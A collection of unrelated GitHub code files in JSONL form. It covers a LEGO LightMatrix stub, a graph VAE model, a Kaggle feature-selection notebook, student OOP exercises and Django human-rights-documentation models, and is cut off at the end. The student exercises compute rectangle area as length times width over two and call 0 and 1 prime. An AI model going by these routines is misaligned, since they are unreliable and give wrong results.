+{"seq_id":"16803858404","text":"from .constants import valid_lightmatrix_images\n\n\nclass LightMatrix:\n \"\"\" LightMatrix\n\n Following are all the functions that are linked to the Light Matrix.\n\n \"\"\"\n\n current_image = \"\"\n\n def __init__(self):\n \"\"\" Constructor for LightMatrix \"\"\"\n print(\"LightMatrix::__init__\")\n\n def show_image(self, image: str, brightness: int = 100):\n \"\"\"Shows an image on the Light Matrix.\n\n Parameters\n ----------\n image : str\n Name of the image\n brightness : int\n Brightness of the image. 0 to 100% (\"0\" is off, and \"100\" is full brightness.)\n\n Raises\n ------\n TypeError\n image is not a string or brightness is not an integer.\n ValueError\n image is not an allowed value or brightness is outside the range 0-100\n\n \"\"\"\n\n if not isinstance(image, str):\n raise TypeError(\"show_image image must be a str\")\n if not isinstance(brightness, int):\n raise TypeError(\"show_image brightness must be an int\")\n\n if image not in valid_lightmatrix_images:\n raise ValueError(\"show_image: image must be one of %r.\" % valid_lightmatrix_images)\n\n if not 0 <= brightness <= 100:\n raise ValueError(\"show_image: brightness out of range (0-100)\")\n\n self.current_image = image\n print(\"LightMatrix::show_image\")\n print(\"Show %s at %s brightness\" % (image, brightness))\n\n def set_pixel(self, x: int, y: int, brightness: int = 100):\n \"\"\"Sets the brightness of one pixel (one of the 25 LEDs) on the Light Matrix.\n\n Parameters\n ----------\n x : int\n Pixel position, counting from the left. In the range 0 to 4.\n y : int\n Pixel position, counting from the top. In the range 0 to 4\n brightness : int\n Brightness of the pixel. In the range 0 to 100.\n\n Raises\n ------\n TypeError\n One of the parameters is not an integer\n ValueError\n x or y is not in the range 0 to 4 or brightness is not in the range 0 to 100.\n\n \"\"\"\n\n if not isinstance(x, int):\n raise TypeError(\"set_pixel x must be an int\")\n if not isinstance(y, int):\n raise TypeError(\"set_pixel y must be an int\")\n if not isinstance(brightness, int):\n raise TypeError(\"set_pixel brightness must be an int\")\n\n if not 0 <= brightness <= 100:\n raise ValueError(\"set_pixel: brightness out of range (0-100)\")\n if not 0 <= x <= 4:\n raise ValueError(\"set_pixel: x out of range (0-4)\")\n if not 0 <= y <= 4:\n raise ValueError(\"set_pixel: y out of range (0-4)\")\n\n self.current_image = \"\"\n print(\"LightMatrix::set_pixel\")\n print(\"Set %s,%s to %s brightness\", (x, y, brightness))\n\n def write(self, text):\n \"\"\" Displays text on the Light Matrix, one letter at a time, scrolling from right to left.\n\n Your program will not continue until all the letters have been shown.\n\n Parameters\n ----------\n text\n Text to write\n \"\"\"\n\n self.current_image = \"\"\n print(\"LightMatrix::write\")\n print(\"Display: %s\" % str(text))\n\n def off(self):\n \"\"\"Turn off all pixels on the light matrix\"\"\"\n\n self.current_image = \"\"\n print(\"LightMatrix::off\")\n","repo_name":"Buildy-Bots-LEGO-League/public-superpowered","sub_path":"src/spike/LightMatrix.py","file_name":"LightMatrix.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1212088387","text":"\n \n#from diff_encoder import Encoder, GNN\nfrom torch_geometric.utils import to_dense_batch, to_dense_adj\nimport os.path as osp\nfrom math import ceil\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nimport torch_geometric.transforms as T\nfrom torch_geometric.data import DenseDataLoader\nfrom torch_geometric.nn import DenseSAGEConv, dense_diff_pool,dense_mincut_pool\nimport torchvision\nimport torch_geometric\nimport torch_geometric.nn as tnn\n\nfrom torch_geometric.nn import EdgeConv, NNConv, GraphConv, DenseGCNConv\nfrom torch_geometric.nn.pool.edge_pool import EdgePooling\n\nfrom torch_geometric.nn.inits import reset\nfrom torch_geometric.nn import TopKPooling, GCNConv,GatedGraphConv, SAGPooling\nfrom torch_geometric.utils import (add_self_loops, sort_edge_index,\n remove_self_loops)\nfrom torch_geometric.utils.repeat import repeat\n\nclass LambdaLayer(nn.Module):\n def __init__(self, lambd):\n super(LambdaLayer, self).__init__()\n self.lambd = lambd\n def forward(self, x,a,s):\n return self.lambd(x,a,s)\n\nclass GraphAE(torch.nn.Module):\n def __init__(self,in_channels, out_channels1, out_channels2,out_channels3,out_channels4, out_channels5,out_channels6, dropout):\n super(GraphAE, self).__init__() \n\n #GAE.reset_parameters(self)\n\n self.out_channels2=out_channels2\n \n \"\"\"\n Encoding\n \"\"\"\n ### Encoding\n \"\"\"\n self.sage1=tnn.DenseGCNConv(in_channels,out_channels1)\n self.sage2=tnn.DenseGCNConv(out_channels1,out_channels2)\n self.sage3=tnn.DenseGCNConv(out_channels2,out_channels3)\n self.sage4=tnn.DenseGCNConv(out_channels3,out_channels4)\n\n self.sage5=tnn.DenseGCNConv(out_channels4,out_channels5)\n \"\"\"\n #DenseSAGEConv(in_channels, out_channels, normalize=False, bias=True)\n self.sage1=tnn.DenseSAGEConv(in_channels,out_channels1,normalize=True)\n #self.sage2=tnn.DenseSAGEConv(out_channels1,out_channels2,normalize=True)\n\n self.sage3=tnn.DenseSAGEConv(out_channels1,out_channels3,normalize=True)\n #self.sage4=tnn.DenseSAGEConv(out_channels3,out_channels4,normalize=True)\n ##self.sage42=nn.Linear(out_channels3,out_channels4)\n\n self.sage5=tnn.DenseSAGEConv(out_channels3,out_channels5,normalize=True)\n self.sage6=tnn.DenseSAGEConv(out_channels5,out_channels6,normalize=True)\n \n ##self.poolit1=tnn.DenseSAGEConv(out_channels2,400)\n self.poolit1=nn.Linear(out_channels1,250)\n self.poolit2=nn.Linear(out_channels3,50)\n #self.poolit3=nn.Linear(out_channels5,50)\n ##self.poolit2=tnn.DenseSAGEConv(out_channels4,200)\n #self.poolit3=tnn.DenseSAGEConv(out_channels5,10)\n \n\n #self.tr1=nn.Linear(out_channels5,out_channels6)\n #self.tr2=nn.Linear(out_channels5,64)\n\n self.tr2=nn.Linear(out_channels5,16)\n\n self.rev2=nn.Linear(16,out_channels5)\n \n \"\"\"\n self.revsage1=tnn.DenseGCNConv(out_channels1,in_channels)\n self.revsage2=tnn.DenseGCNConv(out_channels2,out_channels1)\n\n self.revsage3=tnn.DenseGCNConv(out_channels3,out_channels2)\n self.revsage4=tnn.DenseGCNConv(out_channels4,out_channels3)\n\n self.revsage5=tnn.DenseGCNConv(out_channels5,out_channels4)\n \"\"\"\n self.revsage1=tnn.DenseSAGEConv(out_channels1,in_channels,normalize=False)\n #self.revsage2=tnn.DenseSAGEConv(out_channels2,out_channels1,normalize=True)\n\n self.revsage3=tnn.DenseSAGEConv(out_channels3,out_channels1,normalize=False)\n\n self.revsage5=tnn.DenseSAGEConv(out_channels5,out_channels3,normalize=False)\n self.revsage6=tnn.DenseSAGEConv(out_channels6,out_channels5,normalize=False)\n\n self.drop5=torch.nn.Dropout(p=0.5)\n self.drop4=torch.nn.Dropout(p=0.4)\n self.drop3=torch.nn.Dropout(p=0.3)\n\n ## Batch Normalization\n self.bano1 = nn.BatchNorm1d(num_features=1000)\n self.bano2 = nn.BatchNorm1d(num_features=1000)\n self.bano3 = nn.BatchNorm1d(num_features=250)\n self.bano4 = nn.BatchNorm1d(num_features=50)\n self.bano5 = nn.BatchNorm1d(num_features=50)\n self.bano6 = nn.BatchNorm1d(num_features=50)\n \n #self.prelu=nn.PReLU()\n\n def upsample(self,X,A,S):\n Xout=torch.bmm(S,X)\n\n Aout=torch.bmm(S,torch.bmm(A,S.permute(0,2,1)))\n return Xout,Aout\n\n def encode(self,whole,adj,lengs,mask,maxNodes): \n ### 1 \n hidden=self.sage1(whole,adj)\n hidden=F.relu(hidden)\n hidden=self.bano1(hidden)\n hidden=self.drop5(hidden)\n \"\"\"\n ### 2\n hidden=self.sage2(hidden,adj)\n hidden=F.relu(hidden) \n hidden=self.bano2(hidden)\n hidden=self.drop3(hidden)\n \"\"\"\n\n ### Pool1\n pool1=self.poolit1(hidden)\n \n hidden,adj,mc1,o1=dense_mincut_pool(hidden,adj,pool1,mask)\n\n \n ### 3\n hidden=self.sage3(hidden,adj)\n hidden=F.relu(hidden) \n hidden=self.bano3(hidden)\n hidden=self.drop4(hidden)\n\n ### Pool2\n pool2=self.poolit2(hidden)\n\n hidden,adj,mc2,o2=dense_mincut_pool(hidden,adj,pool2)\n\n hidden=self.sage5(hidden,adj)\n hidden=F.relu(hidden) \n hidden=self.bano5(hidden)\n hidden=self.drop3(hidden)\n\n ### Pool3\n #pool3=self.poolit3(hidden)\n\n #hidden,adj,mc3,o3=dense_mincut_pool(hidden,adj,pool3)\n \"\"\"\n hidden=self.sage6(hidden,adj)\n hidden=F.tanh(hidden) \n hidden=self.bano6(hidden)\n hidden=self.drop3(hidden)\n \"\"\"\n\n return self.tr2(hidden),self.tr2(hidden), adj,pool1,pool2,mc1+mc2,o1+o2\n\n\n def reparametrize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def decode(self,z,adj,s1,s2,maxNodes):\n\n out1=self.rev2(z) \n out1=F.leaky_relu(out1) \n out1=self.drop3(out1)\n \"\"\"\n out1=self.revsage6(out1,adj)\n out1=F.leaky_relu(out1)\n out1=self.bano6(out1)\n out1=self.drop3(out1)\n \"\"\"\n \"\"\"\n out1,adj=self.upsample(out1,adj,s3)\n out1=F.leaky_relu(out1)\n adj=F.sigmoid(adj)\n \"\"\"\n\n out1=self.revsage5(out1,adj)\n out1=F.relu(out1)\n out1=self.bano5(out1)\n out1=self.drop3(out1)\n\n out1,adj=self.upsample(out1,adj,s2)\n out1=F.leaky_relu(out1)\n adj=F.sigmoid(adj)\n\n out1=self.revsage3(out1,adj)\n out1=F.leaky_relu(out1)\n out1=self.bano3(out1)\n out1=self.drop4(out1)\n\n out1,adj=self.upsample(out1,adj,s1)\n out1=F.leaky_relu(out1)\n adj=F.sigmoid(adj)\n\n \"\"\"\n out1=self.revsage2(out1,adj)\n out1=F.relu(out1)\n #out1=self.bano1(out1)\n out1=self.drop4(out1)\n \"\"\"\n\n out1=self.revsage1(out1,adj)\n out1=F.relu(out1)\n #out1=self.bano1(out1)\n\n return out1,adj\n\n def forward(self,x,adj,lengs,refMat,maxNodes):\n mu,logvar,adjMat,s1,s2,l1,l2 = self.encode(x,adj,lengs,refMat,maxNodes) ## mu, log sigma \n z = self.reparametrize(mu, logvar) ## z = mu + eps*sigma \n z,adjMat=self.decode(z,adjMat,s1,s2,maxNodes)\n return z, adjMat, mu, logvar,l1,l2 \n\n","repo_name":"ML4SCI/DeepFalcon","sub_path":"GNN_for_Fast_Detector_Simulation_Ali_Hariri/VAE_version2.py","file_name":"VAE_version2.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"29872408252","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nclass Config:\n name = \"EDA/Agg-RFE\"\n\n n_splits = 5\n seed = 2022\n target = \"target\"\n\n # Colab Env\n upload_from_colab = True\n api_path = \"/content/drive/MyDrive/workspace/kaggle.json\"\n drive_path = \"/content/drive/MyDrive/workspace/kaggle-amex\"\n\n # Kaggle Env\n kaggle_dataset_path = None\n\n # Reka Env\n dir_path = '/home/abe/kaggle/kaggle-amex'\n\n\n# In[2]:\n\n\nimport os\nimport json\nimport warnings\nimport shutil\nimport logging\nimport joblib\nimport random\nimport datetime\nimport sys\nimport gc\nimport multiprocessing\nimport joblib\nimport pickle\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom tqdm.auto import tqdm\nfrom IPython import get_ipython\ntqdm.pandas()\nwarnings.filterwarnings('ignore')\n\n\n# ## Environment Settings\n\n# In[3]:\n\n\nINPUT = os.path.join(Config.dir_path, 'input')\nOUTPUT = os.path.join(Config.dir_path, 'output')\nSUBMISSION = os.path.join(Config.dir_path, 'submissions')\nOUTPUT_EXP = os.path.join(OUTPUT, Config.name)\nEXP_MODEL = os.path.join(OUTPUT_EXP, \"model\")\nEXP_FIG = os.path.join(OUTPUT_EXP, \"fig\")\nEXP_PREDS = os.path.join(OUTPUT_EXP, \"preds\")\n\n# make dirs\nfor d in [INPUT, SUBMISSION, EXP_MODEL, EXP_FIG, EXP_PREDS]:\n os.makedirs(d, exist_ok=True)\n\n\n# ## Load data\n\n# In[4]:\n\n\ntrain = pd.read_pickle(os.path.join(INPUT, 'train_agg.pkl'), compression='gzip')\ntest = pd.read_pickle(os.path.join(INPUT, 'test_agg.pkl'), compression='gzip')\n# train = train.sample(10000)\n# test = test.sample(15000)\n\n\n# In[5]:\n\n\ntrain.info()\n\n\n# In[6]:\n\n\ntrain.head()\n\n\n# ## Evaluation Metric\n\n# In[7]:\n\n\n# https://www.kaggle.com/code/inversion/amex-competition-metric-python\n\ndef amex_metric(y_true: pd.DataFrame, y_pred: pd.DataFrame) -> float:\n\n def top_four_percent_captured(y_true: pd.DataFrame, y_pred: pd.DataFrame) -> float:\n df = (pd.concat([y_true, y_pred], axis='columns')\n .sort_values('prediction', ascending=False))\n df['weight'] = df['target'].apply(lambda x: 20 if x==0 else 1)\n four_pct_cutoff = int(0.04 * df['weight'].sum())\n df['weight_cumsum'] = df['weight'].cumsum()\n df_cutoff = df.loc[df['weight_cumsum'] <= four_pct_cutoff]\n return (df_cutoff['target'] == 1).sum() / (df['target'] == 1).sum()\n\n def weighted_gini(y_true: pd.DataFrame, y_pred: pd.DataFrame) -> float:\n df = (pd.concat([y_true, y_pred], axis='columns')\n .sort_values('prediction', ascending=False))\n df['weight'] = df['target'].apply(lambda x: 20 if x==0 else 1)\n df['random'] = (df['weight'] / df['weight'].sum()).cumsum()\n total_pos = (df['target'] * df['weight']).sum()\n df['cum_pos_found'] = (df['target'] * df['weight']).cumsum()\n df['lorentz'] = df['cum_pos_found'] / total_pos\n df['gini'] = (df['lorentz'] - df['random']) * df['weight']\n return df['gini'].sum()\n\n def normalized_weighted_gini(y_true: pd.DataFrame, y_pred: pd.DataFrame) -> float:\n y_true_pred = y_true.rename(columns={'target': 'prediction'})\n return weighted_gini(y_true, y_pred) / weighted_gini(y_true, y_true_pred)\n\n g = normalized_weighted_gini(y_true, y_pred)\n d = top_four_percent_captured(y_true, y_pred)\n\n return 0.5 * (g + d)\n\ndef lgb_amex_metric(y_true, y_pred):\n \"\"\"The competition metric with lightgbm's calling convention\"\"\"\n return ('amex',\n amex_metric(pd.DataFrame({'target': y_true}), pd.Series(y_pred, name='prediction')),\n True)\n\n\n# ## Transform data type\n\n# In[8]:\n\n\nfloat64_cols = [col for col in train.columns if train[col].dtype == 'float64']\nint64_cols = [col for col in train.columns if train[col].dtype == 'int64']\n\nprint(train.info())\nprint(test.info())\nprint()\nprint(\"-\"*50+f' data type transformation '+'-'*50)\nprint()\n\ndef transform_dtype(df):\n for col in df.columns:\n if df[col].dtype == 'float64':\n df[col] = df[col].astype('float16')\n if df[col].dtype == 'float32':\n df[col] = df[col].astype('float16')\n if df[col].dtype == 'int64':\n df[col] = df[col].astype('int8')\n if df[col].dtype == 'int32':\n df[col] = df[col].astype('int8')\n return df\n\ntrain = transform_dtype(train)\ntest = transform_dtype(test)\n\nprint(train.info())\nprint(test.info())\n\n\n# ## Prerocess\n\n# In[9]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\ncat_cols = [col for col in train.columns if train[col].dtype == 'category']\n\nfor col in cat_cols:\n le = LabelEncoder()\n le.fit(train[col])\n train[col] = le.transform(train[col])\n test[col] = le.transform(test[col])\n\n\n# ## Select Features to Use\n\n# In[10]:\n\n\nfeatures = []\nunuse = ['target', 'customer_ID', 'S_2']\n\nfor col in train.columns:\n if col not in unuse:\n features.append(col)\n\n# print(features)\n\n\n# ## Forward Selection\n\n# In[11]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(train[features].values, train[Config.target].values,\n train_size=0.8,\n random_state=Config.seed,\n shuffle=True)\n\n\n# In[12]:\n\n\nfrom sklearn.feature_selection import RFE\nfrom lightgbm import LGBMClassifier, early_stopping\n\nlgb_params = {\"learning_rate\": 0.01,\n 'num_leaves': 127,\n 'min_child_samples': 2400}\n\nfit_params = {\n 'callbacks': [early_stopping(stopping_rounds=10, verbose=0)],\n 'eval_set': [(X_test, y_test)],\n 'eval_metric': lgb_amex_metric,\n 'verbose': 0\n}\n\nmodel = LGBMClassifier(**lgb_params,\n boosting_type='gbdt',\n objective='binary',\n n_estimators=10000,\n random_state=Config.seed,\n force_col_wise=True,\n n_jobs=32,\n verbose=-1)\n\nrfe = RFE(model,\n n_features_to_select=150,\n step=4,\n verbose=1)\n\nrfe.fit(X_train, y_train, **fit_params)\n\n\n# ## Generate new train data\n\n# In[36]:\n\n\ntrain_new = pd.DataFrame(rfe.transform(train[features]),\n columns=train[features].columns.values[rfe.get_support()])\nresult = pd.DataFrame(rfe.get_support(), index=train[features].columns.values, columns=['used'])\nresult['ranking'] = rfe.ranking_\nresult = result.sort_values('ranking', ascending=True).rename({result.index.name: 'feature'}).reset_index(drop=False).rename({'index': 'feature'}, axis=1)\nresult.to_csv(f'{EXP_MODEL}/rfe_features.csv', index=False)\n\n\n# ## Training\n\n# In[ ]:\n\n\nfrom lightgbm.plotting import plot_metric\nfrom lightgbm import LGBMClassifier, early_stopping\nfrom sklearn.model_selection import StratifiedKFold\n\ndef fit_lgbm(X, y, params=None):\n models = []\n scores = []\n\n skf = StratifiedKFold(n_splits=Config.n_splits, shuffle=True, random_state=Config.seed)\n\n for fold, (train_indices, valid_indices) in enumerate(tqdm(skf.split(X, y))):\n print(\"-\"*50+f' fold{fold} '+'-'*50)\n X_train, y_train = X.iloc[train_indices], y.iloc[train_indices]\n X_valid, y_valid = X.iloc[valid_indices], y.iloc[valid_indices]\n\n model = LGBMClassifier(**params,\n boosting_type='gbdt',\n objective='binary',\n n_estimators=10000,\n random_state=Config.seed,\n force_col_wise=True,\n n_jobs=32,\n verbose=-1)\n\n model.fit(X_train, y_train,\n eval_set=[(X_train, y_train), (X_valid, y_valid)],\n eval_names=['train', 'valid'],\n eval_metric=lgb_amex_metric,\n callbacks=[early_stopping(stopping_rounds=10, verbose=0)],\n verbose=50)\n\n # ------------------- prediction -------------------\n pred = model.predict_proba(X_valid)[:, 1]\n score = amex_metric(pd.DataFrame({'target': y_valid.values}), pd.Series(pred, name='prediction'))\n\n # ------------------- plot -------------------\n plot_metric(model)\n\n # ------------------- save -------------------\n file = f'{EXP_MODEL}/lgbm_fold{fold}.pkl'\n joblib.dump(model, file)\n scores.append(score)\n models.append(model)\n print(f'fold{fold} amex meric: {score}')\n print()\n\n print(f\"OOF Score: {np.mean(scores):.5f}\")\n return models\n\ndef inference_lgbm(models, X):\n pred = np.array([model.predict_proba(X) for model in models])\n pred = np.mean(pred, axis=0)[:, 1]\n return pred\n\n\n# In[38]:\n\n\nfeature_df = pd.read_csv(f'{EXP_MODEL}/rfe_features.csv')\nfeatures = feature_df[feature_df['used'] == True].loc[:, 'feature'].values.tolist()\n\n\n# In[ ]:\n\n\nlgb_params = {\"learning_rate\": 0.01,\n 'num_leaves': 127,\n 'min_child_samples': 2400}\n\nmodels = fit_lgbm(train[features], train[Config.target], params=lgb_params)\n# models = [joblib.load(f'{EXP_MODEL}/lgbm_fold{i}.pkl') for i in range(Config.n_splits)]\npred = inference_lgbm(models, test[features])\n\n\n# ## Plot importance\n\n# In[ ]:\n\n\ndef plot_importances(models):\n importance_df = pd.DataFrame(models[0].feature_importances_,\n index=features,\n columns=['importance'])\\\n .sort_values(\"importance\", ascending=False)\n\n plt.subplots(figsize=(len(features) // 4, 5))\n plt.bar(importance_df.index, importance_df.importance)\n plt.grid()\n plt.xticks(rotation=90)\n plt.ylabel(\"importance\")\n plt.tight_layout()\n plt.savefig(f'{EXP_FIG}/importance.png')\n\nplot_importances(models)\n\n\n# ## Submission\n\n# In[ ]:\n\n\nsub = pd.DataFrame({'customer_ID': test.index,\n 'prediction': pred})\nsub.to_csv(f'{EXP_PREDS}/submission.csv', index=False)\n\n\n# In[ ]:\n\n\nget_ipython().system(' kaggle competitions submit -c amex-default-prediction -f /home/abe/kaggle/kaggle-amex/submissions/submission.csv -m \"Recuresive Feature Elimination for Aggregation Features\"')\n\n","repo_name":"meltyyyyy/kaggle-amex","sub_path":"scripts/eda/agg/rfe.py","file_name":"rfe.py","file_ext":"py","file_size_in_byte":9900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40504003881","text":"# Create a class called rectangle has a length and width attributes. write a method to calculate area\nprint(\"--------q1--------\")\nclass rectangle:\n def __init__(self, length, width):\n self._length = length\n self._width = width\n\n def calculate_area(self):\n area = self._length * self._width / 2\n return area\n\nrec = rectangle(5,3)\nprint(rec.calculate_area())\nprint(\"--------q2--------\")\n# Do Inheritance\nclass Animal:\n def ISleep(self):\n return (\"I do sleep\")\n def IEat(self):\n return (\"I do eat\")\n def ISound(self):\n return (\"I have a sound\")\nclass Dog(Animal):\n def Sound(self):\n return (\"woof!\")\n\nmyDog = Dog()\nprint(myDog.ISound())\nprint(myDog.Sound())\nprint(\"--------q3--------\")\n# Do encapsulation\nclass bank_account:\n def __init__(self):\n self._balance = 0\n def deposit(self,e):\n self._balance += e\n return f\"Guncel bakiye: {self._balance} TRY\"\n def withdraw(self,e:int):\n if self._balance >= e:\n self._balance -= e\n return f\"Guncel bakiye: {self._balance} TRY\\nCekilen Miktar: {e}\"\n else:\n return \"unsufficient balance\"\n\nMyAccount = bank_account()\nprint(MyAccount.deposit(100))\nprint(MyAccount.deposit(100))\nprint(MyAccount.withdraw(75))\nprint(\"--------q4--------\")\n# Do Polymorphism\nclass Circle:\n def __init__(self, radius):\n self.radius = radius\n def calculate_area(self):\n return 3.14 * self.radius**2\n\nclass rectangle:\n def __init__(self, length, width):\n self._length = length\n self._width = width\n def calculate_area(self):\n area = self._length * self._width / 2\n return area\ndef calculate_area(obj):\n return obj.calculate_area()\nucgen = rectangle(10,8)\ndaire = Circle(5)\nprint(calculate_area(ucgen))\nprint(calculate_area(daire))\nprint(\"--------q5--------\")\n# Write a Python function that takes a list of numbers as a parameter and\n# returns the sum of all even numbers in the list\nsayilar = [1,2,3,4,5,6,7,8,9]\ndef even_nums(list):\n total = 0\n for i in range(len(list)):\n if (list[i] % 2) == 0:\n total += list[i]\n return total\nprint(even_nums(sayilar))\nprint(\"--------q6--------\")\n# is_prime\n\ndef is_prime(param):\n for i in range(2, param):\n if param % i==0:\n return False\n return True\n\nprint(is_prime(15))\nprint(\"--------q7--------\")\ndef find_max(param):\n max = param[0]\n for i in range(len(param)):\n if param[i] > max:\n max = param[i]\n return max\n\na =[4, 9, 2, 7, 11, 5]\nprint(find_max(a))\nprint(\"--------q8--------\")\n","repo_name":"aberdayy/COMP2005","sub_path":"midterm_exercise.py","file_name":"midterm_exercise.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71390019685","text":"#704. Binary Search\nfrom typing import List\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n low = 0\n high = len(nums)-1\n while low <= high:\n mid = int((high+low)/2)\n if nums[mid]==target:\n return mid\n elif nums[mid] 0:\n status = status[0]\n return status['status__status_en']\n else:\n return ''\n\n\nclass ActorRelationship(models.Model):\n \"\"\"\n The Actor Relationship model captures the interrelation between actors.\n This can include shared events, familial connections, insititutional\n relationships or rank.\n \"\"\"\n RELATION = (\n ('Parent', 'parent'),\n ('Sibling', 'sibling'),\n ('Family member', 'family member'),\n ('Superior officer', 'superior officer'),\n ('Subordinate officer', 'subordiante officer'),\n )\n relation_status = models.CharField(\n 'status', max_length=25, choices=RELATION)\n comments_en = models.TextField(blank=True, null=True)\n comments_ar = models.TextField(blank=True, null=True)\n actor = models.ForeignKey(\n Actor, blank=True, null=True, related_name='actor_b')\n\n def __unicode__(self):\n return \"%s: %s\" % (self.actor.fullname_en if self.actor else '', self.relation_status)\n\n\nclass RoleType(models.Model):\n \"\"\"\n This object stores RoleTypes\n \"\"\"\n name_en = models.CharField(max_length=255, blank=True, null=True)\n name_ar = models.CharField(max_length=255, blank=True, null=True)\n description_en = models.CharField(max_length=255, blank=True, null=True)\n description_ar = models.CharField(max_length=255, blank=True, null=True)\n\n def __unicode__(self):\n return self.name_en\n\n\nclass RelationType(models.Model):\n \"\"\"\n This object stores RelationTypes\n \"\"\"\n name_en = models.CharField(max_length=255, blank=True, null=True)\n name_ar = models.CharField(max_length=255, blank=True, null=True)\n description_en = models.CharField(max_length=255, blank=True, null=True)\n description_ar = models.CharField(max_length=255, blank=True, null=True)\n\n def __unicode__(self):\n return self.name_en\n\n\nclass ActorRole(models.Model):\n \"\"\"\n This object model captures the role of a given actor\n in relation to either an Incident or a Bulletin.\n \"\"\"\n ROLE_STATUS = (\n ('V', 'Victim'),\n ('WN', 'Witness'),\n ('P', 'Perpetrator'),\n ('A', 'Appeared'),\n ('O', 'Other'),\n )\n RELATION = (\n ('P', 'Parent'),\n ('S', 'Sibling'),\n ('FM', 'Family member'),\n ('SPO', 'Superior officer'),\n ('SBO', 'Subordinate officer'),\n )\n\n role_en = models.CharField(\n max_length=255,\n blank=True,\n null=True)\n role_ar = models.CharField(\n max_length=255,\n blank=True,\n null=True)\n role_status = models.CharField(\n 'status',\n max_length=25,\n choices=ROLE_STATUS,\n blank=True,\n null=True\n )\n\n relation_status = models.CharField(\n 'status',\n max_length=25,\n choices=RELATION,\n blank=True,\n null=True\n )\n role = models.ForeignKey(RoleType, blank=True, null=True)\n relation = models.ForeignKey(RelationType, blank=True, null=True)\n comments_en = models.TextField(blank=True, null=True)\n comments_ar = models.TextField(blank=True, null=True)\n actor = models.ForeignKey(Actor, blank=True, null=True)\n\n def __unicode__(self):\n if self.relation_status is not None:\n return \"%s: %s: %s\" % (self.id, self.relation_status, self.actor.id if self.actor else '')\n else:\n return \"%s: %s: %s\" % (self.id, self.role_status, self.actor.id if self.actor else '')\n\n\nclass BulletinBootstrapManager(models.Manager):\n '''\n format the actors for bootstrapping to make them compatible with tastypie\n api calls\n '''\n\n def filter(self, *args, **kwargs):\n results = super(BulletinBootstrapManager, self).filter(*args, **kwargs)\n # do something with results\n bulletin_fields = [\n 'bulletin_comments', 'bulletin_imported_comments',\n 'bulletin_locations', 'bulletin_labels',\n 'bulletin_sources', 'most_recent_status_bulletin',\n 'count_actors', 'actor_roles_status', 'ref_incidents',\n 'assigned_user', 'sources_count', 'times', 'ref_bulletins',\n 'locations', 'labels', 'sources', 'medias', 'resource_uri',\n ]\n actor_fields = ['actors', 'actors_role', ]\n from corroborator_app.index_meta_prep.bulletinPrepIndex import (\n BulletinPrepMeta)\n from corroborator_app.index_meta_prep.actorPrepIndex import (\n ActorPrepMeta\n )\n bulletin_prep = BulletinPrepMeta()\n actor_prep = ActorPrepMeta()\n bootstrap_results = []\n for result in results:\n updated_bulletin = serializers.serialize('json', [result])\n updated_bulletin = json.loads(updated_bulletin)[0]['fields']\n updated_bulletin['id'] = result.id\n for field in bulletin_fields:\n prep_func = getattr(\n bulletin_prep,\n 'prepare_' + field\n )\n updated_bulletin[field] = prep_func(result)\n for field in actor_fields:\n prep_func = getattr(\n actor_prep,\n 'prepare_' + field\n )\n updated_bulletin[field] = prep_func(result)\n if updated_bulletin['confidence_score'] is None:\n updated_bulletin['confidence_score'] = ''\n bootstrap_results.append(updated_bulletin)\n return bootstrap_results\n\n\nclass Bulletin(models.Model):\n \"\"\"\n This model represents the Bulletin object. It is intended\n to capture the relationship specifically between Media objects,\n chronological events and Actors' roles.\n \"\"\"\n TYPE = (\n ('Video', 'video'),\n ('Picture', 'picture'),\n ('Report', 'report'),\n ('News', 'news'),\n )\n objects = models.Manager()\n bootstrap_bulletins = BulletinBootstrapManager()\n\n seq_order = models.IntegerField(blank=True, null=True)\n title_en = models.CharField(max_length=255)\n title_ar = models.CharField(max_length=255, blank=True)\n description_en = models.TextField(blank=True, null=True)\n description_ar = models.TextField(blank=True, default='')\n uri = models.CharField('Media Link', max_length=255, blank=True, null=True)\n confidence_score = models.IntegerField(\n 'confidence score', blank=True, null=True)\n type = models.CharField('type', max_length=25, choices=TYPE, blank=True)\n bulletin_created = models.DateTimeField(auto_now_add=True)\n bulletin_modified = models.DateTimeField(auto_now=True)\n\n origin_id = models.CharField(max_length=255, blank=True, null=True)\n \"\"\"\n This field tracks whether the entitiy has been deleted and should thus be\n ignored by the UI\n \"\"\"\n deleted = models.BooleanField(default=False)\n\n # foreign key fields\n assigned_user = models.ForeignKey(User, blank=True, null=True)\n\n # ManyToManyFields\n sources = models.ManyToManyField(Source, blank=True)\n bulletin_comments = models.ManyToManyField(Comment, blank=True)\n bulletin_imported_comments = models.ManyToManyField(\n Comment,\n blank=True,\n related_name=\"bulletin_imported_comments\"\n )\n labels = models.ManyToManyField(Label, blank=True)\n times = models.ManyToManyField(TimeInfo, blank=True)\n\n actors_role = models.ManyToManyField(ActorRole, blank=True)\n medias = models.ManyToManyField(Media, blank=True)\n locations = models.ManyToManyField(Location, blank=True)\n ref_bulletins = models.ManyToManyField('self', blank=True)\n\n def __unicode__(self):\n return self.title_en\n\n def get_time_length(self):\n \"\"\"\n This method returns the time range for a given Bulletin event.\n It is used by Django Haystack in construction of the Solr Index.\n TODO: this is common to more than one model - extract it to a\n method\n \"\"\"\n time = self.times.aggregate(\n lowest=Min('time_from'), highest=Max('time_to'))\n string = ''\n\n if(len(time) > 0):\n if time[\"lowest\"] is not None and time[\"highest\"] is not None:\n duration = (time[\"lowest\"] - time[\"highest\"]).days\n date_length = time[\"highest\"].strftime('%Y/%m/%d') + '→'\\\n + time[\"lowest\"].strftime('%Y/%m/%d')\n string = '{0}' +\\\n '({1} days)'\n string = string.format(date_length, 